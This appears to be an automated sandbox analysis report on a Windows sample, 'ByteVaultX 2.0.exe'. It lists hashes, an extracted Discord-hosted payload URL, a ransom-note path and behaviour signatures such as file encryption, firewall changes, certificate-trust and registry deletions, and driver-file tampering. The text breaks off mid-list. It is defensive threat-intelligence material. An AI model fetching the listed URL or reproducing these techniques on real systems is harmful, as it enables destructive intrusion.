Resubmissions
25-05-2024 23:51
240525-3wjp3afg59 10Analysis
-
max time kernel
644s -
max time network
768s -
platform
windows10-1703_x64 -
resource
win10-20240404-en -
resource tags
arch:x64arch:x86image:win10-20240404-enlocale:en-usos:windows10-1703-x64system -
submitted
25-05-2024 23:51
Behavioral task
behavioral1
Sample
ByteVaultX 2.0.exe
Resource
win10-20240404-en
Behavioral task
behavioral2
Sample
ByteVaultX 2.0.exe
Resource
win10v2004-20240426-en
Behavioral task
behavioral3
Sample
ByteVaultX 2.0.exe
Resource
win11-20240426-en
General
-
Target
ByteVaultX 2.0.exe
-
Size
9.9MB
-
MD5
26001ddd86377ac2ec3fcedb8d6f36b9
-
SHA1
cf4d832df5227ede476c0794cf871a4bcecb4d36
-
SHA256
a37c17c44274545f31048dddb5a98c21c10c31deda6543330e4da26bf485fc7c
-
SHA512
a09fe56683b4a42ce02b0e1e28557223bf0e925212e9f6541a805b914e08ab06843821d8e991fa0d3709e4e41b55db4c7b95496a29958665d10ab177b5a62277
-
SSDEEP
196608:9h5kRIk7AHkPkRJW9GNZA1HeT39Iig6eE9TFa0Z8DOjCdylNo1nz8QW7tx:aGFG8S1+TtIi+Y9Z8D8CclydoPx
Malware Config
Extracted
https://cdn.discordapp.com/attachments/1181543227728330774/1244074466372489216/212723.jpg?ex=6653ca22&is=665278a2&hm=488e396c7831aaf740c20bf7536b9cc45421a2218ebf98197ebc307863606195&
Extracted
C:\Encrypt\encrypt.html
Signatures
-
Process spawned unexpected child process 1 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
Processes:
OfficeC2RClient.exedescription pid pid_target process target process Parent C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE is not expected to spawn this process 1208 4640 OfficeC2RClient.exe EXCEL.EXE -
Renames multiple (153) files with added filename extension
This suggests ransomware activity of encrypting all the files on the system.
-
Blocklisted process makes network request 14 IoCs
Processes:
powershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exeflow pid process 3 4624 powershell.exe 5 428 powershell.exe 14 4132 powershell.exe 15 1308 powershell.exe 16 4964 powershell.exe 21 4584 powershell.exe 37 1468 powershell.exe 38 4408 powershell.exe 42 5032 powershell.exe 43 1832 powershell.exe 44 1300 powershell.exe 52 808 powershell.exe 53 4712 powershell.exe 54 1588 powershell.exe -
Disables Task Manager via registry modification
-
Drops file in Drivers directory 64 IoCs
Processes:
cmd.execmd.exedescription ioc process File opened for modification C:\Windows\System32\drivers\en-US\processr.sys.mui cmd.exe File opened for modification C:\Windows\System32\drivers\afd.sys cmd.exe File opened for modification C:\Windows\System32\drivers\VerifierExt.sys cmd.exe File opened for modification C:\Windows\System32\drivers\xinputhid.sys cmd.exe File opened for modification C:\Windows\System32\drivers\ndisuio.sys cmd.exe File opened for modification C:\Windows\System32\drivers\vwifimp.sys cmd.exe File opened for modification C:\Windows\System32\drivers\wacompen.sys cmd.exe File opened for modification C:\Windows\System32\drivers\dxgmms1.sys cmd.exe File opened for modification C:\Windows\System32\drivers\en-US\mssmbios.sys.mui cmd.exe File opened for modification C:\Windows\System32\drivers\udfs.sys cmd.exe File opened for modification C:\Windows\System32\drivers\USBXHCI.SYS cmd.exe File opened for modification C:\Windows\System32\drivers\en-US\amdk8.sys.mui cmd.exe File opened for modification C:\Windows\System32\drivers\tbs.sys cmd.exe File opened for modification C:\Windows\System32\drivers\Ndu.sys cmd.exe File opened for modification C:\Windows\System32\drivers\rmcast.sys cmd.exe File opened for modification C:\Windows\System32\drivers\fdc.sys cmd.exe File opened for modification C:\Windows\System32\drivers\hyperkbd.sys cmd.exe File opened for modification C:\Windows\System32\drivers\swenum.sys cmd.exe File opened for modification C:\Windows\System32\drivers\en-US\sdbus.sys.mui cmd.exe File opened for modification C:\Windows\System32\drivers\gm.dls cmd.exe File opened for modification C:\Windows\System32\drivers\rdyboost.sys cmd.exe File opened for modification C:\Windows\Syswow64\drivers\gm.dls cmd.exe File opened for modification C:\Windows\System32\drivers\en-US\iorate.sys.mui cmd.exe File opened for modification C:\Windows\System32\drivers\en-US\mslldp.sys.mui cmd.exe File opened for modification C:\Windows\System32\drivers\en-US\RNDISMP.sys.mui cmd.exe File opened for modification C:\Windows\System32\drivers\mouhid.sys cmd.exe File opened for modification C:\Windows\System32\drivers\msgpiowin32.sys cmd.exe File opened for modification C:\Windows\System32\drivers\umbus.sys cmd.exe File opened for modification C:\Windows\System32\drivers\dumpfve.sys cmd.exe File opened for modification C:\Windows\System32\drivers\en-US\spbcx.sys.mui cmd.exe File opened for modification C:\Windows\System32\drivers\terminpt.sys cmd.exe File opened for modification C:\Windows\System32\drivers\tsusbhub.sys cmd.exe File opened for modification C:\Windows\System32\drivers\UMDF\en-US\hidscanner.dll.mui cmd.exe File opened for modification C:\Windows\System32\drivers\usb8023.sys cmd.exe File opened for modification C:\Windows\System32\drivers\wmiacpi.sys cmd.exe File opened for modification C:\Windows\System32\drivers\circlass.sys cmd.exe File opened for modification C:\Windows\System32\drivers\en-US\dumpsd.sys.mui cmd.exe File opened for modification C:\Windows\System32\drivers\wmilib.sys cmd.exe File opened for modification C:\Windows\System32\drivers\en-US\dmvsc.sys.mui cmd.exe File opened for modification C:\Windows\System32\drivers\en-US\mssecflt.sys.mui cmd.exe File opened for modification C:\Windows\System32\drivers\iagpio.sys cmd.exe File opened for modification C:\Windows\System32\drivers\UMDF\SensorsCx.dll cmd.exe File opened for modification C:\Windows\System32\drivers\en-US\vhdmp.sys.mui cmd.exe File opened for modification C:\Windows\System32\drivers\en-US\serial.sys.mui cmd.exe File opened for modification C:\Windows\System32\drivers\hidir.sys cmd.exe File opened for modification C:\Windows\System32\drivers\stream.sys cmd.exe File opened for modification C:\Windows\System32\drivers\buttonconverter.sys cmd.exe File opened for modification C:\Windows\System32\drivers\en-US\ucx01000.sys.mui cmd.exe File opened for modification C:\Windows\System32\drivers\srv.sys cmd.exe File opened for modification C:\Windows\System32\drivers\en-US\netvsc.sys.mui cmd.exe File opened for modification C:\Windows\System32\drivers\en-US\http.sys.mui cmd.exe File opened for modification C:\Windows\System32\drivers\UMDF\EhStorPwdDrv.dll cmd.exe File opened for modification C:\Windows\System32\drivers\ataport.sys cmd.exe File opened for modification C:\Windows\System32\drivers\fsdepends.sys cmd.exe File opened for modification C:\Windows\System32\drivers\mouclass.sys cmd.exe File opened for modification C:\Windows\System32\drivers\UMDF\en-US\idtsec.dll.mui cmd.exe File opened for modification C:\Windows\System32\drivers\UMDF\en-US\mgtdyn.dll.mui cmd.exe File opened for modification C:\Windows\System32\drivers\dxgkrnl.sys cmd.exe File opened for modification C:\Windows\System32\drivers\rasl2tp.sys cmd.exe File opened for modification C:\Windows\System32\drivers\scfilter.sys cmd.exe File opened for modification C:\Windows\System32\drivers\usbprint.sys cmd.exe File opened for modification C:\Windows\System32\drivers\lltdio.sys cmd.exe File opened for modification C:\Windows\System32\drivers\gmreadme.txt cmd.exe File opened for modification C:\Windows\System32\drivers\rasacd.sys cmd.exe -
Manipulates Digital Signatures 1 TTPs 35 IoCs
Attackers can apply techniques such as changing the registry keys of authenticode & Cryptography to obtain their binary as valid.
Processes:
regedit.execmd.execmd.exedescription ioc process Key deleted \REGISTRY\USER\S-1-5-21-1687926120-3022217735-1146543763-1000\Software\Microsoft\SystemCertificates\TrustedPublisher regedit.exe Key deleted \REGISTRY\USER\S-1-5-21-1687926120-3022217735-1146543763-1000\Software\Policies\Microsoft\SystemCertificates\trust regedit.exe Key deleted \REGISTRY\USER\S-1-5-21-1687926120-3022217735-1146543763-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs regedit.exe Key deleted \REGISTRY\USER\S-1-5-21-1687926120-3022217735-1146543763-1000\Software\Policies\Microsoft\SystemCertificates\TrustedPublisher\CRLs regedit.exe Key deleted \REGISTRY\USER\S-1-5-21-1687926120-3022217735-1146543763-1000\Software\Policies\Microsoft\SystemCertificates\TrustedPublisher\CTLs regedit.exe Key deleted \REGISTRY\USER\S-1-5-21-1687926120-3022217735-1146543763-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Software\Microsoft\SystemCertificates\trust\Certificates regedit.exe Key deleted \REGISTRY\USER\S-1-5-21-1687926120-3022217735-1146543763-1000\Software\Microsoft\SystemCertificates\trust\CRLs regedit.exe Key deleted \REGISTRY\USER\S-1-5-21-1687926120-3022217735-1146543763-1000\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates regedit.exe Key deleted \REGISTRY\USER\S-1-5-21-1687926120-3022217735-1146543763-1000\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs regedit.exe Key deleted \REGISTRY\USER\S-1-5-21-1687926120-3022217735-1146543763-1000\Software\Microsoft\SystemCertificates\TrustedPublisher\CRLs regedit.exe Key deleted \REGISTRY\USER\S-1-5-21-1687926120-3022217735-1146543763-1000\Software\Policies\Microsoft\SystemCertificates\trust\Certificates regedit.exe Key deleted \REGISTRY\USER\S-1-5-21-1687926120-3022217735-1146543763-1000\Software\Microsoft\SystemCertificates\TrustedPeople regedit.exe Key deleted \REGISTRY\USER\S-1-5-21-1687926120-3022217735-1146543763-1000\Software\Policies\Microsoft\SystemCertificates\TrustedPublisher\Certificates regedit.exe Key deleted \REGISTRY\USER\S-1-5-21-1687926120-3022217735-1146543763-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Software\Microsoft\SystemCertificates\trust\CTLs regedit.exe Key deleted \REGISTRY\USER\S-1-5-21-1687926120-3022217735-1146543763-1000\Software\Microsoft\SystemCertificates\trust\Certificates regedit.exe Key deleted \REGISTRY\USER\S-1-5-21-1687926120-3022217735-1146543763-1000\Software\Microsoft\SystemCertificates\TrustedPublisher\Certificates regedit.exe Key deleted \REGISTRY\USER\S-1-5-21-1687926120-3022217735-1146543763-1000\Software\Microsoft\SystemCertificates\trust\CTLs regedit.exe Key deleted \REGISTRY\USER\S-1-5-21-1687926120-3022217735-1146543763-1000\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates regedit.exe Key deleted \REGISTRY\USER\S-1-5-21-1687926120-3022217735-1146543763-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Software\Microsoft\SystemCertificates\TrustedPeople regedit.exe Key deleted \REGISTRY\USER\S-1-5-21-1687926120-3022217735-1146543763-1000\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs regedit.exe Key deleted \REGISTRY\USER\S-1-5-21-1687926120-3022217735-1146543763-1000\Software\Policies\Microsoft\SystemCertificates\trust\CTLs regedit.exe Key deleted \REGISTRY\USER\S-1-5-21-1687926120-3022217735-1146543763-1000\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs regedit.exe Key deleted \REGISTRY\USER\S-1-5-21-1687926120-3022217735-1146543763-1000\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs regedit.exe Key deleted \REGISTRY\USER\S-1-5-21-1687926120-3022217735-1146543763-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Software\Microsoft\SystemCertificates\trust\CRLs regedit.exe Key deleted \REGISTRY\USER\S-1-5-21-1687926120-3022217735-1146543763-1000\Software\Microsoft\SystemCertificates\TrustedPublisher\CTLs regedit.exe Key deleted \REGISTRY\USER\S-1-5-21-1687926120-3022217735-1146543763-1000\Software\Policies\Microsoft\SystemCertificates\trust\CRLs regedit.exe Key deleted \REGISTRY\USER\S-1-5-21-1687926120-3022217735-1146543763-1000\Software\Policies\Microsoft\SystemCertificates\TrustedPublisher regedit.exe Key deleted \REGISTRY\USER\S-1-5-21-1687926120-3022217735-1146543763-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs regedit.exe Key deleted \REGISTRY\USER\S-1-5-21-1687926120-3022217735-1146543763-1000\Software\Microsoft\SystemCertificates\trust regedit.exe Key deleted \REGISTRY\USER\S-1-5-21-1687926120-3022217735-1146543763-1000\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing regedit.exe Key deleted \REGISTRY\USER\S-1-5-21-1687926120-3022217735-1146543763-1000\Software\Policies\Microsoft\SystemCertificates\TrustedPeople regedit.exe Key deleted \REGISTRY\USER\S-1-5-21-1687926120-3022217735-1146543763-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Software\Microsoft\SystemCertificates\trust regedit.exe Key deleted \REGISTRY\USER\S-1-5-21-1687926120-3022217735-1146543763-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates regedit.exe File opened for modification C:\Windows\System32\wintrust.dll cmd.exe File opened for modification C:\Windows\Syswow64\wintrust.dll cmd.exe -
Modifies Installed Components in the registry 2 TTPs 8 IoCs
Processes:
regedit.exedescription ioc process Key deleted \REGISTRY\USER\S-1-5-21-1687926120-3022217735-1146543763-1000\Software\Microsoft\Active Setup\Installed Components\{6BF52A52-394A-11d3-B153-00C04F79FAA6} regedit.exe Key deleted \REGISTRY\USER\S-1-5-21-1687926120-3022217735-1146543763-1000\Software\Microsoft\Active Setup\Installed Components\{89820200-ECBD-11cf-8B85-00AA005B4340} regedit.exe Key deleted \REGISTRY\USER\S-1-5-21-1687926120-3022217735-1146543763-1000\Software\Microsoft\Active Setup\Installed Components\{89820200-ECBD-11cf-8B85-00AA005B4383} regedit.exe Key deleted \REGISTRY\USER\S-1-5-21-1687926120-3022217735-1146543763-1000\Software\Microsoft\Active Setup\Installed Components\{89B4C1CD-B018-4511-B0A1-5476DBF70820} regedit.exe Key deleted \REGISTRY\USER\S-1-5-21-1687926120-3022217735-1146543763-1000\Software\Microsoft\Active Setup\Installed Components\{8A69D345-D564-463c-AFF1-A69D9E530F96} regedit.exe Key deleted \REGISTRY\USER\S-1-5-21-1687926120-3022217735-1146543763-1000\Software\Microsoft\Active Setup\Installed Components regedit.exe Key deleted \REGISTRY\USER\S-1-5-21-1687926120-3022217735-1146543763-1000\Software\Microsoft\Active Setup\Installed Components\{2C7339CF-2B09-4501-B3F3-F3508C9228ED} regedit.exe Key deleted \REGISTRY\USER\S-1-5-21-1687926120-3022217735-1146543763-1000\Software\Microsoft\Active Setup\Installed Components\{44BBA840-CC51-11CF-AAFA-00AA00B6015C} regedit.exe -
Modifies Windows Firewall 2 TTPs 64 IoCs
Processes:
netsh.exenetsh.exenetsh.exenetsh.exenetsh.exenetsh.exenetsh.exenetsh.exenetsh.exenetsh.exenetsh.exenetsh.exenetsh.exenetsh.exenetsh.exenetsh.exenetsh.exenetsh.exenetsh.exenetsh.exenetsh.exenetsh.exenetsh.exenetsh.exenetsh.exenetsh.exenetsh.exenetsh.exenetsh.exenetsh.exenetsh.exenetsh.exenetsh.exenetsh.exenetsh.exenetsh.exenetsh.exenetsh.exenetsh.exenetsh.exenetsh.exenetsh.exenetsh.exenetsh.exenetsh.exenetsh.exenetsh.exenetsh.exenetsh.exenetsh.exenetsh.exenetsh.exenetsh.exenetsh.exenetsh.exenetsh.exenetsh.exenetsh.exenetsh.exenetsh.exenetsh.exenetsh.exenetsh.exenetsh.exepid process 2596 netsh.exe 4796 netsh.exe 1232 netsh.exe 676 netsh.exe 2964 netsh.exe 2748 netsh.exe 1300 netsh.exe 2608 netsh.exe 4132 netsh.exe 5108 netsh.exe 640 netsh.exe 2112 netsh.exe 4148 netsh.exe 168 netsh.exe 616 netsh.exe 2700 netsh.exe 4144 netsh.exe 4204 netsh.exe 1108 netsh.exe 1888 netsh.exe 4196 netsh.exe 3948 netsh.exe 4608 netsh.exe 3812 netsh.exe 2452 netsh.exe 4764 netsh.exe 3648 netsh.exe 4916 netsh.exe 2592 netsh.exe 904 netsh.exe 2748 netsh.exe 3428 netsh.exe 4012 netsh.exe 4108 netsh.exe 3316 netsh.exe 4016 netsh.exe 1788 netsh.exe 3340 netsh.exe 3688 netsh.exe 3996 netsh.exe 5024 netsh.exe 2204 netsh.exe 2240 netsh.exe 3928 netsh.exe 3964 netsh.exe 792 netsh.exe 1800 netsh.exe 2292 netsh.exe 4344 netsh.exe 1424 netsh.exe 292 netsh.exe 2320 netsh.exe 2700 netsh.exe 1304 netsh.exe 5104 netsh.exe 428 netsh.exe 2192 netsh.exe 3076 netsh.exe 204 netsh.exe 2192 netsh.exe 4996 netsh.exe 3100 netsh.exe 4608 netsh.exe 2932 netsh.exe -
Registers new Print Monitor 2 TTPs 10 IoCs
Processes:
regedit.exedescription ioc process Key deleted \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Print\Monitors\IppMon regedit.exe Key deleted \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Print\Monitors\Microsoft Shared Fax Monitor regedit.exe Key deleted \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Print\Monitors\Standard TCP/IP Port\Ports regedit.exe Key deleted \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Print\Monitors\Standard TCP/IP Port regedit.exe Key deleted \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Print\Monitors\USB Monitor regedit.exe Key deleted \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Print\Monitors\WSD Port\OfflinePorts regedit.exe Key deleted \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Print\Monitors\Appmon\Ports regedit.exe Key deleted \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Print\Monitors\Appmon regedit.exe Key deleted \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Print\Monitors\Local Port regedit.exe Key deleted \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Print\Monitors\WSD Port regedit.exe -
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
Processes:
ByteVaultX 2.0.exedescription ioc process Key value queried \REGISTRY\USER\S-1-5-21-1687926120-3022217735-1146543763-1000\Control Panel\International\Geo\Nation ByteVaultX 2.0.exe -
Loads dropped DLL 12 IoCs
Processes:
ByteVaultX 2.0.exepid process 3040 ByteVaultX 2.0.exe 3040 ByteVaultX 2.0.exe 3040 ByteVaultX 2.0.exe 3040 ByteVaultX 2.0.exe 3040 ByteVaultX 2.0.exe 3040 ByteVaultX 2.0.exe 3040 ByteVaultX 2.0.exe 3040 ByteVaultX 2.0.exe 3040 ByteVaultX 2.0.exe 3040 ByteVaultX 2.0.exe 3040 ByteVaultX 2.0.exe 3040 ByteVaultX 2.0.exe -
Modifies file permissions 1 TTPs 6 IoCs
Processes:
takeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exepid process 4916 takeown.exe 148 takeown.exe 656 takeown.exe 3428 takeown.exe 588 takeown.exe 2324 takeown.exe -
Modifies system executable filetype association 2 TTPs 3 IoCs
Processes:
regedit.exedescription ioc process Key deleted \REGISTRY\USER\S-1-5-21-1687926120-3022217735-1146543763-1000_Classes\lnkfile\shellex\ContextMenuHandlers\ FileSyncEx regedit.exe Key deleted \REGISTRY\USER\S-1-5-21-1687926120-3022217735-1146543763-1000_Classes\lnkfile\shellex\ContextMenuHandlers regedit.exe Key deleted \REGISTRY\USER\S-1-5-21-1687926120-3022217735-1146543763-1000_Classes\lnkfile\shellex regedit.exe -
Registers COM server for autorun 1 TTPs 64 IoCs
Processes:
regedit.exedescription ioc process Key deleted \REGISTRY\USER\S-1-5-21-1687926120-3022217735-1146543763-1000_Classes\CLSID\{CAFEEFAC-0016-0000-0144-ABCDEFFEDCBA}\InprocServer32 regedit.exe Key deleted \REGISTRY\USER\S-1-5-21-1687926120-3022217735-1146543763-1000_Classes\CLSID\{CAFEEFAC-0018-0000-0062-ABCDEFFEDCBB}\InprocServer32 regedit.exe Key deleted \REGISTRY\USER\S-1-5-21-1687926120-3022217735-1146543763-1000_Classes\CLSID\{CAFEEFAC-0018-0000-0076-ABCDEFFEDCBC}\InprocServer32 regedit.exe Key deleted \REGISTRY\USER\S-1-5-21-1687926120-3022217735-1146543763-1000_Classes\CLSID\{CAFEEFAC-0018-0000-0180-ABCDEFFEDCBC}\InprocServer32 regedit.exe Key deleted \REGISTRY\USER\S-1-5-21-1687926120-3022217735-1146543763-1000_Classes\CLSID\{CAFEEFAC-0015-0000-0020-ABCDEFFEDCBC}\InprocServer32 regedit.exe Key deleted \REGISTRY\USER\S-1-5-21-1687926120-3022217735-1146543763-1000_Classes\CLSID\{CAFEEFAC-0017-0000-0235-ABCDEFFEDCBC}\InprocServer32 regedit.exe Key deleted \REGISTRY\USER\S-1-5-21-1687926120-3022217735-1146543763-1000_Classes\CLSID\{CAFEEFAC-0017-0000-0292-ABCDEFFEDCBB}\InprocServer32 regedit.exe Key deleted \REGISTRY\USER\S-1-5-21-1687926120-3022217735-1146543763-1000_Classes\CLSID\{CAFEEFAC-0018-0000-0154-ABCDEFFEDCBA}\InprocServer32 regedit.exe Key deleted \REGISTRY\USER\S-1-5-21-1687926120-3022217735-1146543763-1000_Classes\CLSID\{CAFEEFAC-0018-0000-0160-ABCDEFFEDCBA}\InprocServer32 regedit.exe Key deleted \REGISTRY\USER\S-1-5-21-1687926120-3022217735-1146543763-1000_Classes\CLSID\{CAFEEFAC-0018-0000-0219-ABCDEFFEDCBA}\InprocServer32 regedit.exe Key deleted \REGISTRY\USER\S-1-5-21-1687926120-3022217735-1146543763-1000_Classes\CLSID\{CAFEEFAC-0018-0000-0010-ABCDEFFEDCBB}\InprocServer32 regedit.exe Key deleted \REGISTRY\USER\S-1-5-21-1687926120-3022217735-1146543763-1000_Classes\CLSID\{CAFEEFAC-0018-0000-0070-ABCDEFFEDCBC}\InprocServer32 regedit.exe Key deleted \REGISTRY\USER\S-1-5-21-1687926120-3022217735-1146543763-1000_Classes\CLSID\{CAFEEFAC-0018-0000-0224-ABCDEFFEDCBC}\InprocServer32 regedit.exe Key deleted \REGISTRY\USER\S-1-5-21-1687926120-3022217735-1146543763-1000_Classes\CLSID\{CAFEEFAC-0015-0000-0056-ABCDEFFEDCBA}\InprocServer32 regedit.exe Key deleted \REGISTRY\USER\S-1-5-21-1687926120-3022217735-1146543763-1000_Classes\CLSID\{CAFEEFAC-0016-0000-0174-ABCDEFFEDCBA}\InprocServer32 regedit.exe Key deleted \REGISTRY\USER\S-1-5-21-1687926120-3022217735-1146543763-1000_Classes\CLSID\{CAFEEFAC-0017-0000-0025-ABCDEFFEDCBB}\InprocServer32 regedit.exe Key deleted \REGISTRY\USER\S-1-5-21-1687926120-3022217735-1146543763-1000_Classes\CLSID\{CAFEEFAC-0018-0000-0051-ABCDEFFEDCBC}\InprocServer32 regedit.exe Key deleted \REGISTRY\USER\S-1-5-21-1687926120-3022217735-1146543763-1000_Classes\CLSID\{CAFEEFAC-0016-0000-0059-ABCDEFFEDCBC}\InprocServer32 regedit.exe Key deleted \REGISTRY\USER\S-1-5-21-1687926120-3022217735-1146543763-1000_Classes\CLSID\{CAFEEFAC-0016-0000-0092-ABCDEFFEDCBA}\InprocServer32 regedit.exe Key deleted \REGISTRY\USER\S-1-5-21-1687926120-3022217735-1146543763-1000_Classes\CLSID\{CAFEEFAC-0017-0000-0230-ABCDEFFEDCBA}\InprocServer32 regedit.exe Key deleted \REGISTRY\USER\S-1-5-21-1687926120-3022217735-1146543763-1000_Classes\CLSID\{CAFEEFAC-0014-0001-0007-ABCDEFFEDCBA}\InprocServer32 regedit.exe Key deleted \REGISTRY\USER\S-1-5-21-1687926120-3022217735-1146543763-1000_Classes\CLSID\{CAFEEFAC-0016-0000-0085-ABCDEFFEDCBA}\InprocServer32 regedit.exe Key deleted \REGISTRY\USER\S-1-5-21-1687926120-3022217735-1146543763-1000_Classes\CLSID\{CAFEEFAC-0016-0000-0195-ABCDEFFEDCBC}\InprocServer32 regedit.exe Key deleted \REGISTRY\USER\S-1-5-21-1687926120-3022217735-1146543763-1000_Classes\CLSID\{CAFEEFAC-0017-0000-0070-ABCDEFFEDCBB}\InprocServer32 regedit.exe Key deleted \REGISTRY\USER\S-1-5-21-1687926120-3022217735-1146543763-1000_Classes\CLSID\{CAFEEFAC-0017-0000-0245-ABCDEFFEDCBA}\InprocServer32 regedit.exe Key deleted \REGISTRY\USER\S-1-5-21-1687926120-3022217735-1146543763-1000_Classes\CLSID\{CAFEEFAC-0017-0000-0091-ABCDEFFEDCBA}\InprocServer32 regedit.exe Key deleted \REGISTRY\USER\S-1-5-21-1687926120-3022217735-1146543763-1000_Classes\CLSID\{CAFEEFAC-0017-0000-0160-ABCDEFFEDCBB}\InprocServer32 regedit.exe Key deleted \REGISTRY\USER\S-1-5-21-1687926120-3022217735-1146543763-1000_Classes\CLSID\{CAFEEFAC-0018-0000-0063-ABCDEFFEDCBA}\InprocServer32 regedit.exe Key deleted \REGISTRY\USER\S-1-5-21-1687926120-3022217735-1146543763-1000_Classes\CLSID\{CAFEEFAC-0018-0000-0367-ABCDEFFEDCBC}\InprocServer32 regedit.exe Key deleted \REGISTRY\USER\S-1-5-21-1687926120-3022217735-1146543763-1000_Classes\CLSID\{C5FF006E-2AE9-408C-B85B-2DFDD5449D9C}\InprocServer32 regedit.exe Key deleted \REGISTRY\USER\S-1-5-21-1687926120-3022217735-1146543763-1000_Classes\CLSID\{CAFEEFAC-0013-0001-0088-ABCDEFFEDCBB}\InprocServer32 regedit.exe Key deleted \REGISTRY\USER\S-1-5-21-1687926120-3022217735-1146543763-1000_Classes\CLSID\{CAFEEFAC-0014-0002-0075-ABCDEFFEDCBB}\InprocServer32 regedit.exe Key deleted \REGISTRY\USER\S-1-5-21-1687926120-3022217735-1146543763-1000_Classes\CLSID\{CAFEEFAC-0013-0001-0081-ABCDEFFEDCBB}\InprocServer32 regedit.exe Key deleted \REGISTRY\USER\S-1-5-21-1687926120-3022217735-1146543763-1000_Classes\CLSID\{CAFEEFAC-0015-0000-0001-ABCDEFFEDCBB}\InprocServer32 regedit.exe Key deleted \REGISTRY\USER\S-1-5-21-1687926120-3022217735-1146543763-1000_Classes\CLSID\{CAFEEFAC-0017-0000-0251-ABCDEFFEDCBB}\InprocServer32 regedit.exe Key deleted \REGISTRY\USER\S-1-5-21-1687926120-3022217735-1146543763-1000_Classes\CLSID\{CAFEEFAC-0017-0000-0290-ABCDEFFEDCBA}\InprocServer32 regedit.exe Key deleted \REGISTRY\USER\S-1-5-21-1687926120-3022217735-1146543763-1000_Classes\CLSID\{CAFEEFAC-0018-0000-0054-ABCDEFFEDCBA}\InprocServer32 regedit.exe Key deleted \REGISTRY\USER\S-1-5-21-1687926120-3022217735-1146543763-1000_Classes\CLSID\{CAFEEFAC-0016-0000-0091-ABCDEFFEDCBC}\InprocServer32 regedit.exe Key deleted \REGISTRY\USER\S-1-5-21-1687926120-3022217735-1146543763-1000_Classes\CLSID\{CAFEEFAC-0017-0000-0128-ABCDEFFEDCBC}\InprocServer32 regedit.exe Key deleted \REGISTRY\USER\S-1-5-21-1687926120-3022217735-1146543763-1000_Classes\CLSID\{CAFEEFAC-0018-0000-0125-ABCDEFFEDCBA}\InprocServer32 regedit.exe Key deleted \REGISTRY\USER\S-1-5-21-1687926120-3022217735-1146543763-1000_Classes\CLSID\{CAFEEFAC-0018-0000-0377-ABCDEFFEDCBC}\InprocServer32 regedit.exe Key deleted \REGISTRY\USER\S-1-5-21-1687926120-3022217735-1146543763-1000_Classes\CLSID\{CAFEEFAC-0015-0000-0061-ABCDEFFEDCBA}\InprocServer32 regedit.exe Key deleted \REGISTRY\USER\S-1-5-21-1687926120-3022217735-1146543763-1000_Classes\CLSID\{CAFEEFAC-0016-0000-0145-ABCDEFFEDCBC}\InprocServer32 regedit.exe Key deleted \REGISTRY\USER\S-1-5-21-1687926120-3022217735-1146543763-1000_Classes\CLSID\{CAFEEFAC-0016-0000-0175-ABCDEFFEDCBC}\InprocServer32 regedit.exe Key deleted \REGISTRY\USER\S-1-5-21-1687926120-3022217735-1146543763-1000_Classes\CLSID\{CAFEEFAC-0017-0000-0076-ABCDEFFEDCBA}\InprocServer32 regedit.exe Key deleted \REGISTRY\USER\S-1-5-21-1687926120-3022217735-1146543763-1000_Classes\CLSID\{CAFEEFAC-0017-0000-0176-ABCDEFFEDCBA}\InprocServer32 regedit.exe Key deleted \REGISTRY\USER\S-1-5-21-1687926120-3022217735-1146543763-1000_Classes\CLSID\{CAFEEFAC-0017-0000-0300-ABCDEFFEDCBC}\InprocServer32 regedit.exe Key deleted \REGISTRY\USER\S-1-5-21-1687926120-3022217735-1146543763-1000_Classes\CLSID\{CAFEEFAC-0018-0000-0193-ABCDEFFEDCBB}\InprocServer32 regedit.exe Key deleted \REGISTRY\USER\S-1-5-21-1687926120-3022217735-1146543763-1000_Classes\CLSID\{CAFEEFAC-0018-0000-0358-ABCDEFFEDCBC}\InprocServer32 regedit.exe Key deleted \REGISTRY\USER\S-1-5-21-1687926120-3022217735-1146543763-1000_Classes\CLSID\{CAFEEFAC-0014-0001-0002-ABCDEFFEDCBA}\InprocServer32 regedit.exe Key deleted \REGISTRY\USER\S-1-5-21-1687926120-3022217735-1146543763-1000_Classes\CLSID\{CAFEEFAC-0014-0002-0018-ABCDEFFEDCBA}\InprocServer32 